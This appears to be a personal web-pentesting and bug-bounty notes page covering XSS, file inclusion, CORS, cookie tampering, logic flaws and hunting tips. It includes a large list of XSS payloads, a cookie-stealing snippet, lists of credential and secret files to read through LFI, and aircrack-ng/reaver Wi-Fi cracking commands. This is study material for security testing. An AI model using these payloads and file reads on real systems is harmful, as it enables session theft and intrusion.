    Somehow attacker gets user to click a link that interacts with the existing web page to store something in the browser's DOM (for example, storing an URL parameter into the src attribute of an img tag). Then after the NEXT page is fetched from the web-app server, the code or user input does something malicious, maybe redirect user to some other site, or use user's creds to do web-app operations, or copy a session token or cookie and send it to attacker. This is XSS because the code came from some other domain, but now is executing in the web-app's domain. It can happen just about anywhere that user input is put straight into the current page (DOM), without sending it to the server.

    From Excess XSS:
    In reflected or stored XSS, the malicious JavaScript is executed when the page is loaded, as part of the HTML sent by the server.

    In DOM-based XSS, the malicious JavaScript is executed at some point after the page has loaded, as a result of the page's legitimate JavaScript treating user input in an unsafe way.

    If the code redirects the user to some other site, this is a form of "Open Redirect", where application's page normally redirects to an URL, and somehow you can change this so it goes to URL of Attacker's Server. User may not notice that they're no longer in a trusted app.

    Brute's "DOM-based XSS - The 3 Sinks"

    [There is another form of DOM-based XSS which is "stored" ? Code comes from database, modifies the DOM, then something bad happens ?]

    Another form of DOM-based XSS: attacker uses a proxy to modify the response from the server, and the client code in the DOM reacts by doing something it shouldn't. For example, change "payment succeeded" flag in response from false to true, and see what the client code does. That code is running in application's domain, so it's not the same as the attacker trying to modify the DOM directly. Or the code might be complex or obfuscated, and this is an easy way to turn on hidden features. Change a mode flag in the response from "user" to "admin". Change a debug flag from false to true.
    Jon Bottarini article

  • Stored (AKA sXSS, or second-order XSS, or source-based XSS, or persistent XSS).

    Attacker's code is stored in server and served to other users in pages. This is persistent. Common in applications where users can communicate with each other, or admins review user-generated content.

    Attacker --sends malicious data--> Web/App Server --stores malicious data--> Database Server
    Later ...
    User --normal page request--> Web/App Server --request for data--> Database Server
    User <--page with malicious script-- Web/App Server <--data containing malicious script-- Database Server

    Code stored by one user is served to another user, without being sanitized properly. Page does application operations using user's creds, or other malicious things.

    [There's really no "cross-site" in this.]

    Stored XSS is considered the most serious because:
    • There's no need to make a user click a link (they just use the application).
    • The user is guaranteed to be logged in to the application when they get the code.
    • Many users can be compromised with just one piece of stored code.
    • Even privileged users (who may be more wary of clicking a link) can be compromised.
    • More likely to work with any browser, unlike DOM-based XSS.

  • Self-XSS.

    Could be any one of the three previous types (reflected, DOM-based, stored), but only affects the current user (attacker).

    Maybe this could be used to bypass client-side validation, and probe the server from within a same-origin page. Disable rate-limiting and try passwords, or log in/out repeatedly and see if there's a pattern to session token values.

    hacker_snail's "My first attempt at XSS"

  • Mutation XSS.

    Give page code that is "illegal" in a way that confuses the parsing and scripting engines in the browser. In some cases, you can get a parser to change code from HTML to script.

    LiveOverflow's "XSS on Google Search - Sanitizing HTML in The Client?" (video)

Not sure where this fits:
If an app's page has anchor tags that include 'target="_blank"', it may be vulnerable: Alex / JitBit article.

So each of these involves a first step to get bad data in (bad parameters, SQLi, Script Injection, Template Injection, etc) and then a second step to do exploitation (Request Forgery or redirection or other).

[For reflected and DOM-based XSS:]
From Chapter 12 "Attacking Users: Cross-Site Scripting" in "The Web Application Hacker's Handbook" by Stuttard and Pinto:
... you may be forgiven for wondering why, if the attacker can induce the user to visit a URL of his choosing, he bothers with the rigamarole of transmitting his malicious JavaScript via the XSS bug in the vulnerable application. Why doesn't he simply host a malicious script on and feed the user a direct link to this script? Wouldn't this script execute in the same way as it does in the example described?

To understand why the attacker needs to exploit the XSS vulnerability, recall the same-origin policy that was described in Chapter 3. Browsers segregate content that is received from different origins (domains) in an attempt to prevent different domains from interfering with each other within a user's browser. The attacker's objective is not simply to execute an arbitrary script but to capture the user's session token. Browsers do not let just any old script access a domain's cookies; otherwise, session hijacking would be easy. Rather, cookies can be accessed only by the domain that issued them. They are submitted in HTTP requests back to the issuing domain only, and they can be accessed via JavaScript contained within or loaded by a page returned by that domain only. Hence, if a script residing on queries document.cookie, it will not obtain the cookies issued by, and the hijacking attack will fail.

The reason why the attack that exploits the XSS vulnerability is successful is that, as far as the user's browser is concerned, the attacker's malicious JavaScript was sent to it by ... This is why the attacker's script, although it actually originates elsewhere, can gain access to the cookies issued by This is also why the vulnerability itself has become known as cross-site scripting.

Another factor is that the link or page-URL the user sees is that of the (trusted) Web/App Server. The link may come to the user via email or by seeing it on Attacker's Server somehow, or from a page or message in the application, but user trusts it because it points to the real application.

From "Penetration Testing" by Georgia Weidman:
"Cross-site scripting exploits the trust a user has in a website".

Possible payloads/effects of exploiting XSS:
  • Defacing the app (presenting bad pages to users), embarrassing the company or costing it money.

  • CSRF: do operations using the user's session token and permissions.

  • Phishing: convince users to type login credentials or other sensitive info, for the app or for other sites, into a web-app page that sends the info to the attacker.

  • Cookie-stealing: get script to execute:
    document.location = ''+encodeURIComponent(document.cookie);
    or create new DOM element:
      var e=document.createElement('img');

  • Steal auto-completed data from form fields in web-app page.

  • Exploit the browser to grab browsing history, or do OS commands that result in keylogging or other actions.

  • A malicious attacker could have the web-app page load ads that provide revenue to the attacker, or do "likes" of attacker's page on Facebook.

  • Use the web-app page to send messages or emails to other users.

Luke Stephens' "How to Upgrade Your XSS Bugs from Medium to Critical"

How to approach a web page to look for XSS, from Hacker101 - XSS and Authorization (video):
  • Give input and trace where it comes back out. In a tag attribute, or text of a tag, or a string in a script ?

  • Look for any special cases, such as URLs turned into Anchor tags.

  • Figure out how special characters are handled. Maybe give one string of
    and see what comes out. The handling of special characters should vary by context: in an URL, in an attribute, in a tag's text, in a script.

Excess XSS
Wikipedia's "Cross-site scripting"
OWASP's "Cross-site Scripting (XSS)"
Jean Fleury's "A Not-So-Brief Overview of Cross-Site Scripting"
Jean Fleury's "ClickJacking vs Cross Site Request Forgery"
Kurt Muhl's "Cross-site scripting: How to go beyond the alert"
zseano's "Cross Site Scripting (XSS) - The famous alert"
XSS articles in Hacking Articles' "Web Penetration Testing"
DRD_'s "Discover XSS Security Flaws by Fuzzing with Burp Suite, Wfuzz & XSStrike"
DRD_'s "Advanced Techniques to Bypass & Defeat XSS Filters, Part 1"
DRD_'s "Advanced Techniques to Bypass & Defeat XSS Filters, Part 2"
EvilToddler's "Find XSS Vulnerable Sites with the Big List of Naughty Strings"
Joe Smith's "Cross Site Scripting (XSS) Basics"
Alex Long's "Use JavaScript Injections to Locally Manipulate the Websites You Visit"
Alex Long's "How Cross-Site Scripting (XSS) Attacks Sneak into Unprotected Websites (Plus: How to Block Them)"
CrackerHacker's "Exploiting XSS with BEEF (Part 1)"
DomGoat's "Client XSS Introduction"
Bugcrowd University - Cross Site Scripting (XSS) (video) (stale)
reddit's /r/xss might have some bugs posted but the bounty not claimed
Brute's "XSS 101"
Brute's "The 7 Main XSS Cases Everyone Should Know"
Brute's "Probing to Find XSS"
Brute's "File Upload XSS"
Brute's "Using XSS to Control a Browser"
Holly Graceful's "ClickJacking and JavaScript KeyLogging in Iframes"
See Chapter 12 "Attacking Users: Cross-Site Scripting" in "The Web Application Hacker's Handbook" by Stuttard and Pinto.
Security Idiots' "Posts Related to Web-Pentest-XSS"

Sites that often are vulnerable: sites that allow users to edit themes, or add CSS, or set event/meeting name, or show your Facebook page in a frame, or specify filename for uploading, or set a custom Error page.
"Multi-context polyglot payload": String that tries to work in many different contexts, so you don't spend a lot of times trying many approaches.

Tools, mostly:
XSS.Cx (a Crawler and Injection Reporting Tool)
int0x33 / 420 (Automated XSS Vulnerability Finder)
XSS Chef (generate HTML and script payloads to order)

Payloads, mostly:
Code to put (one at a time) into URL parameters and form fields, and see if they execute or come back in the page source:

<iframe src=javascript:alert(1)>
alert '1'
alert (/1/)
" autofocus onfocus=alert(1) x="
<marquee onstart=alert(1)>test</marquee>
"><script >alert(document.cookie)</script >
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
# fake URL param "foo":
EdOverflow / bugbounty-cheatsheet /
RSnake's "XSS cheatsheet"
OWASP's "XSS Filter Evasion Cheat Sheet"
Gareth Heyes' "One XSS cheatsheet to rule them all"
PortSwigger's "XSS cheat sheet"
int0x33's "XSS Payloads, getting past alert(1)"
Zgheb's "XSS Tricks"
XSS Payloads
XSS Polyglot Challenge v2
Jack Masa's XSS Mindmap
Pgaijin66 / XSS-Payloads
RenwaX23 / XSS Without parentheses ()
0xSobky / HackVault / Unleashing an Ultimate XSS Polyglot
JS-Alpha (convert JS code to contain only /[a-z.()]/ characters)

Paraphrased from Chapter 12 "Attacking Users: Cross-Site Scripting" in "The Web Application Hacker's Handbook" by Stuttard and Pinto:
You can introduce script code into an HTML page in four broad ways:
  • Script Tags: either standalone or wrapped inside a tag.
    <object data="data:text/html,<script>alert(1)</script>">
    <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
    <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">Click here</a>
    <script>onerror=alert;throw 1</script>
    <script>{onerror=alert}throw 1</script>
    <script>throw onerror=alert,'some string',123,'haha'</script>
    <script>{onerror=prompt}throw{lineNumber:1,columnNumber:1,fileName:'second argument',message:'first argument'}</script>
    <script> ='=/',0[onerror=eval]['/-alert(1)//']</script>

  • Event Handlers:
    <style onreadystatechange=alert(1)>
    <object onerror=alert(1)>
    <img src=1 onerror=alert(1)>
    <video src=1 onerror=alert(1)>
    <audio src=1 onerror=alert(1)>
    <x src=1 onerror=alert(1)>Click here</x>
    <img/anyjunk/onerror=alert(1) src=1>
    <img onerror="alert(1)"src=1>
    <img onerror="alert '1'"src=1>
    <img onerror="alert (/1/)"src=1>
    <img src=1 onerror=alert;throw 1;>
    <img src=1 onerror=eval;throw'=alert\x281\x29';>
    <img src=`1`onerror=alert(1)>
    <img src=1 onerror=a&#x06c;ert(1)>
    <img src=1 onerror=a&#x006c;ert(1)>
    <img src=1 onerror=a&#108;ert(1)>
    <object onerror=debugger;>
    window.setTimeout(function(){ alert(1); }, 3000)

  • Script Pseudo-Protocols:
    <object data=javascript:alert(1)>
    <embed src=javascript:alert(1)>
    <form id=test /><button form=test formaction=javascript:alert(1)>
    <event-source src=javascript:alert(1)>
    <a href="javascript:alert(document.domain)">sometext</a>

  • Dynamically Evaluated Styles:
    <x style=x:expression(alert(1))>
    <x style=behavior:url(#default#time2) onbegin=alert(1)>

Also, change the base path used for relative URLs:

<base href="">
<script src="goodscript.js"></script>

Sean Wright's "Cross-Site Scripting (XSS) Exploitation"

Cross-Site Leaking (XS-Leak, XS-Search)

A new and growing set of techniques, where code from one site finds out information about activity from another site. For example, clear browser cache, have user load a page, see if a certain image appears in the cache.

James Walker's "New XS-Leak techniques reveal fresh ways to expose user information"

File Inclusion (LFI, RFI)

This could cause "file execution" or "file viewing".

For execution: Some languages let the server-side scripting do an "include" of a file's contents into the executable of the script. Trick the code into using your file, or rewrite the contents of the file it already uses.

For viewing: Where the code expects the path of some user-uploaded file (such as a CV/resume, or a message attachment), give it the path of some app or system file (such as /etc/passwd).

Good files to get on Linux: /etc/passwd, /etc/shadow, /proc/version, /proc/self/version, /proc/sched_debug, /proc/mounts, id_rsa.
Aidan Preston's "Linux Notes / Cheatsheet"

There are several different ways to accomplish this:
  • If URL parameters are used to specify the filename, give an URL to your site.
  • If URL parameters are used to select the file, give bad URL parameters.
  • If the filename comes from the database, do SQLi to change the filename.
  • If a template engine is involved, do template injection.
  • If you have achieved OS access to the Web/App Server, rewrite the file.
  • If there is non-HTTP access to the server (FTP, SCP, WebDAV, etc), use that to rewrite the file.
  • If there is a File Upload vuln in the app, use that to rewrite the file.

If you can change the filename used, you can change it to name of a:
  • Local File (LFI).
    Attacker --req for page X--> Web/App Server
    Attacker <--results of executing code from local file F-- Web/App Server
  • Remote File (RFI).
    Attacker --req for page X--> Web/App Server --req for file F--> Attacker's Server
    Attacker <--results of executing code from remote file F-- Web/App Server <--contents of file F-- Attacker's Server

URL parameters likely to do a file inclusion:
  • file=
  • folder=
  • path=
  • style=
  • template=
  • php_path=
  • doc=
  • document=
  • root=
  • pg=
  • pdf=

Wikipedia's "File inclusion vulnerability"
EdOverflow / bugbounty-cheatsheet / LFI
Asfiya Shaikh's "File Path Traversal and File Inclusions"
Jean Fleury's "Finally, My First Bug Bounty Write Up (LFI)"
George Mauer's "The Absurdly Underestimated Dangers of CSV Injection"
LFI/RFI articles in Hacking Articles' "Web Penetration Testing"
OWASP's "Testing for Local File Inclusion"
OWASP's "Testing for Remote File Inclusion"
WASC's "Remote File Inclusion"
Kevin Burns' "Directory Traversal, File Inclusion, and The Proc File System"
Aptive's "Local File Inclusion (LFI) Web Application Penetration Testing"
Arr0way's "LFI Cheat Sheet"

From Bbinfosec's "Collection Of Bug Bounty Tip - Will Be updated daily":
"If you find a LFI, ignore /etc/passwd and go for /var/run/secrets/ This will raise the severity when you hand them a Kubernetes token or cert." [Also look for ~/.aws/credentials]

Insecure CORS (Cross Origin Resource Sharing)

Browsers enforce "same-origin policy", which means a resource can be accessed from a page only if protocols (HTTP, HTTPS) match, port numbers (80, 443, etc) match, and domains match exactly. But developers can weaken this by using messaging (postMessage), or by changing document.domain in the DOM, or by using CORS (XMLHttpRequests to domains outside your origin, using special headers).

"As far as I am aware, nothing aside from a browser even gives the CORS headers a second glance. They don't do anything in and of themselves; they are purely instructions to a browser to say 'here is how these sites can interact'."

wikipedia's "Cross-origin resource sharing"
James Kettle's "Exploiting CORS misconfigurations for Bitcoins and bounties"
Geekboy's "Exploiting Misconfigured CORS (Cross Origin Resource Sharing)"
Suyog Palav's "Exploitation of Mis-configured Cross-Origin Resource Sharing (CORS)"
Muhammad Khizer Javed's "Exploiting Insecure Cross Origin Resource Sharing (CORS)"
Brute's "Cross-Origin Scripting"

Cookie Tampering

Edit application's cookie on the client side, to see what happens if you delete or add or modify components/parameters. Use Firefox's development tools, or use Burp to catch the response headers and modify the cookie there. You need to catch the setting of the cookie, the first time that is done.

Try changing the order of parameters in the cookie, or adding duplicate parameters, to see what happens. Set illegal values, or additional parameters with new names. If you get errors back from the web/app server, that could give you useful info.

An app should be setting the HTTPOnly and Secure flags on the cookie. If HTTPOnly isn't set, client-side JavaScript can read and modify the cookie. If Secure isn't set, the cookie can be used in HTTP as well as in HTTPS.

If you see any encoded data in the cookie, definitely try to decode it, it should be something important. If it ends in "=" or contains "/", it's probably Base64 encoded. If it's all hex digits, usually all-uppercase or all-lowercase, it's probably hex-encoded. 32-40 nybbles of hex, probably a hash.

It's not a vuln if you can copy a cookie between two sessions that you started for different users, and suddenly user2 has the permissions of user1. It is a vuln if you can get that to happen without having access to both machines/browsers.

Hacker101 - Cookie Tampering Techniques (video)

Macro Mosaic's "Hack SAML Single Sign-on with Burp Suite"

Barrow's "Use Remote Port Forwarding to Slip Past Firewall Restrictions Unnoticed"

CrackerHacker's "Upload a Shell to a Web Server and Get Root (RFI): Part 1"
CrackerHacker's "Upload a Shell to a Web Server and Get Root (RFI): Part 2"

Ceos3c's "Obtaining Domain Credentials through a Printer with Netcat"
Printer Exploitation Toolkit

Weird forms of IP address (overflows, different bases, http://127.1 instead of, http://1.1.257 instead of, http://0xC0A80001 or http://3232235521 instead of, etc) or domain name, to get past a blacklist or filter. Called "URL obfuscation" ?
sii / sipcalc
David Anderson's "Fun with IP address parsing"
Chris Siebenmann's "My uncertainty over whether an URL format is actually legal"

Weird / unicode encodings in email addresses, URLs, JavaScript code, etc:
Christopher Bleckmann-Dreher's "How does 🙈 or 💩 affect our S�curity?" (slide show)

Cache poisoning: if there is a cache between clients and server, set HTML request headers such as X-Host, X-Forwarded-Host, X-Original-Url, X-Rewrite-URL, and cache returns malicious data. Need to know which headers and parameters are used in cache matching (which are in the cache key). Use Param Miner extension for Burp.

Some ways of transferring a file to a target: FTP, SFTP, TFTP, SCP, WebDAV, shell (run netcat or ncat or something), file-share (NFS, Samba, etc), web app's Upload/Attachment features, object API (SOAP, REST) over HTTP.

Some ways of connecting to a target: HTTP, Telnet, RDP, SSH, VNC, TeamViewer.

For most attack types, you can type "TYPE payloads" or "TYPE exploits" into a search engine and get links to lots of useful cheat-sheets. For example, search for "XSS payloads".

EdOverflow / bugbounty-cheatsheet / CRLF Injection || HTTP Response Splitting

EdOverflow / bugbounty-cheatsheet / Open Redirect

Jayson Grace's "Web Application Penetration Testing Notes"
Jayson Grace's "Pentesting notes and snippets"
Arr0way's "Penetration Testing Tools Cheat Sheet"
k2haxor / HACK-THEM-ALL
Raj Chandel's "Hacking Articles"

swisskyrepo / PayloadsAllTheThings

amanvir's "Security Issues in Modern JavaScript"
It's JavaScript
Shankar R's "Bug Hunting Methodology(Part-3)" (tips and snippets)






Application-configuration attacks

+/- Harsh Bothra's "10 Most Common Security Issues Found in Login Functionalities"

Application-logic or business-logic attacks

QA engineer walks into a bar
There is no magic cheatsheet for this kind of attack/exploit. You have to study the application and try to do unexpected things.

Some examples:
  • Give it dates in the future/past in inappropriate ways.
  • Give it negative order numbers or order quantities or payments.
  • If it's using encrypted tokens, copy a token from one area to another, or find two places where it's creating the tokens differently.
  • If there are multi-stage operations, try to skip a stage or many stages. In a later stage, try to modify data (price, username, amount paid, etc) set and validated in an earlier stage. See how the process changes for users with different privilege levels.
  • User1 sends message and then deletes account, user2 tries to reply to the message ?
  • Create account User1, store some data, delete account, then try to create new account of same name.
  • Violating some constraint that is not enforced (two users with same username or same email address ?).
  • Trigger errors everywhere you can, and see how they are handled and reported.
  • If some operations are particularly complicated, look at those.
  • Modify a password-reset request so it specifies your email address but another user's ID ? article1 article2
  • If the application can be tricked into doing something weird/alarming to many users (e.g. flood them with SMS messages), that may not be a security flaw per se, but it could cause damage to the company's reputation.
  • Sensitive-information disclosure: for example, if the application reveals something it shouldn't about another user, that may not be a security flaw per se, but it is wrong behavior.
See Chapter 11 "Attacking Application Logic" in "The Web Application Hacker's Handbook" by Stuttard and Pinto.

Client-Side SQL Injection / Local Storage

HTML5 supports client-side SQL databases, which applications can use to store data on the client.

Maybe explore what is stored there for the attacker-as-normal-user, and see how the client-side code manipulates it. Look for places where URL parameters or user input get into the database. Then try to do a sort of "reflected SQL injection", where parameters given to user result in SQL that extracts data and sends it to attacker ?

See Chapter 13 "Attacking Users: Other Techniques" in "The Web Application Hacker's Handbook" by Stuttard and Pinto.

Flash, Silverlight, and Internet Explorer have their own local storage mechanisms.

HTML5 has local storage mechanisms.
tutorialspoint's "HTML5 - Web Storage"

Mobile Attacks

Mobile app may have all the same issues as web apps (because often the mobile app is talking to a web app or server somewhere), plus many more client-side issues. The app developer usually can't control what version of OS is on the client, what other apps are on it, whether it's rooted/jailbroken, etc.

Since you can get the binary and maybe some source of a mobile app, look inside it for keys, URLs, IP addresses, email addresses, comments, credentials.

Cristian R's "10 things you must do when Pentesting Android Applications"
Vickie Li's "An Android Hacking Primer"
Craig Hays' "Target their mobile apps"
Ben Sadeghipour's "Q&A With Android Hacker bagipro"

Mobexler's "Mobile Application Penetration Testing Checklist"
tanprathan / MobileApp-Pentest-Cheatsheet
Brute's "XSS in Mobile Devices"
tanprathan / MobileApp-Pentest-Cheatsheet

See Mobile App Tools.

Thick App / Desktop App Attacks

From people on reddit:
Deobfuscate with de4dot, decompile using dnspy, capture soap messages using proxy and burp, read memory strings using process hacker.


Tooling tip: check out Jet Brain's dotPeek, it's the best .NET decompiler I've found.

For vulnerabilities, I usually focus hard on anything cryptography or authentication related. People always f*ck those up. How are passwords secured? How is authentication handled? Is there any mechanism for preventing users from doing things they're not authorized to do within the application? If so, how is that enforced?

If the application is connected to a database, make sure things are properly sanitised. Is there a back-end? If so, is communication with the back-end handled securely?

Almost all of what you learned from doing web stuff applies here, just differently.


Dotpeeker and Windbg are worth a look.

Also MS has this list of tools that may help:


Very often the most interesting attack vectors in such setups derive from client-side workflow enforcement. I've seen systems in which administrative rights were checked on the client side or where parameter enforcement was done on the client. Isolate the API calls and see what you can do with them.

Attack Tips and Tactics



Quick try at a site

[From Jason Haddix's "How To Shot Web" (PDF)]

  1. Visit the search, registration, contact, password reset, and comment forms and hit them with your polyglot (XSS) strings.

  2. Scan those specific functions with Burp's built-in scanner.

  3. Check your cookie, log out, check cookie, log in, check cookie. Submit old cookie, see if access.

  4. Perform user enumeration checks on login, registration, and password reset.

  5. Do a reset and see if: the password comes plaintext, uses a URL based token, is predictable, can be used multiple times, or logs you in automatically.

  6. Find numeric account identifiers anywhere in URLs and rotate them for context change.

  7. Find the security-sensitive function(s) or files and see if vulnerable to non-auth browsing (IDORs), lower-auth browsing, CSRF, CSRF protection bypass, and see if they can be done over HTTP.

  8. Directory brute for top short list on SecLists.

  9. Check upload functions for alternate file types that can execute code (XSS or PHP etc).

From /u/cym13 on reddit 5/2019:
  • Build a list of websites with bug bounty programs. Make sure that they have similar terms and conditions. Always abide by those terms and conditions. The reason why I recommend restricting yourself to similar terms is to limit confusion.

  • Explore those sites. You need to know them well, what technologies they use, how they're structured, their subdomains, etc. Enumeration is paramount.

  • Subscribe to /r/netsec, /r/security, /r/bugbounty, anything that gives you security articles daily. Read them. If you don't understand search, ask or store them for later, but it's important to understand as much as possible. This will build your arsenal.

  • Now oftentimes you'll see an article that lights a bulb, for example a remote code execution for websites using Ruby on Rails. At that point you should think "Oh, I know these two sites in my list that use RoR, I should try this technique there!".

  • Repeat. Expend your list of targets regularly but not too often that you don't remember them well. This technique is not perfect, but it'll help grow your understanding of what's possible, will get you to actually try things without feeling too down when you don't find anything (and most most of the time you won't) and it might even give you an edge against other hunters since you may very well be the first to try that technique on that website.

  • Always remember: the worst possible thing isn't that you don't find anything, it's that you don't give yourself a chance to try. Learn on labs if you want, in books if you want, but this should never be a substitute to going out there to try stupid stuff.

For beginners, from InsiderPhD's "Finding Your First Bug" series (video):
IDOR or API bugs are good places for a beginner to start. They don't require deep technical knowledge, and persistence can pay off, but being methodical and systematic and keeping notes are important. Make sure your report specifies the business impact: instead of "changed parameter X in the URL and the server accepted it", something like "was able to buy expensive product Y for $1".

From /u/Metasploit-Ninja on reddit 1/2019:
Re: misconfigurations:

For pentesting, the vast majority of findings you come across are misconfigurations. Could be screw ups in group policy or bad password policies, etc but I see a lot of things like default creds for web instances like Apache Tomcat (tomcat:tomcat or admin:admin), etc.

I also see a lot of misconfigurations in Vmware Enterprise setups where a customer will have a PCI-DSS/CDE network that is supposed to be segmented from the regular enterprise/production network but isn't fully. For example, there might be a vSphere/vCenter instance that connects to all the VMware Hosts and the customer might have a host for just PCI and others for their regular production network but the vCenter/vSphere can connect to all of them. So if you compromised credentials like a VMware admin in the regular production network, you can just use vCenter/vSphere to jump into a PCI/CDE host then compromise the VMs or even take a snapshot of the VMs you want and download them from the datastore. I see this in a LOT of different places and people don't even think about it. They just see how info flows physically and logically but not how it flows virtually.

Also, I'll see two-factor setups with things like 2FA Duo where they have it set to "open" if the user getting the 2FA request doesn't press anything. This is because Duo communicates via cloud and if something happens to the connection, you can't login to critical systems so by default it fails open. If you have a fairly stable connection, you wouldn't want it that way. If an attacker gets creds and tries to login lets say at 3am and you are sleeping, it would time out and they would then get in without you pressing anything. Oops.

I also see a lot of OWA instances where you can enumerate users because of timing attack vulnerabilities associated with their instance. For example, if you gather a list of users from LinkedIn, social media sites, Google, etc, you can create a list and throw it against the OWA server and if the user is actually present, it will usually respond back with a valid/invalid error after 0.2 seconds. If the user doesn't exist in Active Directory, it will respond back after ~13-15 seconds. See Metasploit module auxiliary/scanner/http/owa_login for info on that and options.

I could go on but those are common ones I see all the time.

Craig Hays' "Bug Bounty Hunting Tips #1 - Always read the source code"
Somdev Sangwan's "Finding vulnerabilities in Source Code"

Craig Hays' "Develop a Process and Follow It"
Sean's "One company: 262 bugs, 100% acceptance, 2.57 priority, millions of user details saved"
EdOverflow / bugbounty-cheatsheet /
Bugcrowd forum discussion "How do you approach a target?"
Jean Fleury's "So You Want To Become a Bug Bounty Hunter?"
Aakash Choudhary's "Bug-Hunting-Tips/Tricks"
Sanyam Chawla's "Bug Bounty Methodology (TTP- Tactics, Techniques, and Procedures) V 2.0"
sehno's "Bug Bounty Checklist for Web App"
gowsundar's "Book of BugBounty Tips"
Stök and Jason Haddix: "If you're not doing this you're missing out" (video)

When you think you've found a bug

Gather samples of as many types of sensitive data as you can (not as much data as you can). Can you list all users ? Get passwords for user accounts or for accounts on other systems or services ? Get log files ? Get configuration files that show other network devices ? Get PII for users ? Get version numbers of OS and software ? Get encrypted files to try to crack later ?

Can you use this to do another exploit, a better one ?

Kunal Pandey's "Avoid rookie mistakes and progress positively in bug bounty"

Does the same bug exist in other apps that use the same module ?
Offensive Security by Automation's "Open Redirection: A Case Study"

Interesting thoughts: LiveOverflow's "What is a Security Vulnerability?" (video)

Star Trek Picard: have you tried reversing the polarity of something ?


Cracking Wi-Fi password (don't get excited, probably your network interface is not supported)

Following SecurityEquifax's "How to Hack a Wi-Fi Password - 2020 Guide"
Don't use WiFi Cracko; I've read that it's mostly marketing hype.

sudo apt install aircrack-ng reaver

ip -c addr			#  get interface name such as wlp18s0
sudo airmon-ng		#  get interface name such as wlp18s0

sudo airmon-ng check
sudo airmon-ng check kill
sudo airmon-ng check
sudo airodump-ng wlp18s0	# get BSSID of target network, such as 00:90:4C:C1:AC:21
# Failed; didn't work for me, probably my interface chip not supported.
ctrl+C to stop
sudo reaver -i wlp18s0 -b THEBSSID -vv -K
# The target network must have activity on it during this time.

sudo airmon-ng start wlp18s0
sudo airodump-ng wlp18s0
# Failed; didn't work for me, probably my interface chip not supported.

# Another way to get SSIDs (and see all signals):
sudo apt install linssid
sudo linssid

sudo apt remove aircrack-ng reaver
sudo rfkill
sudo rfkill unblock all
# May have to reboot a couple of times for networking to get back to normal.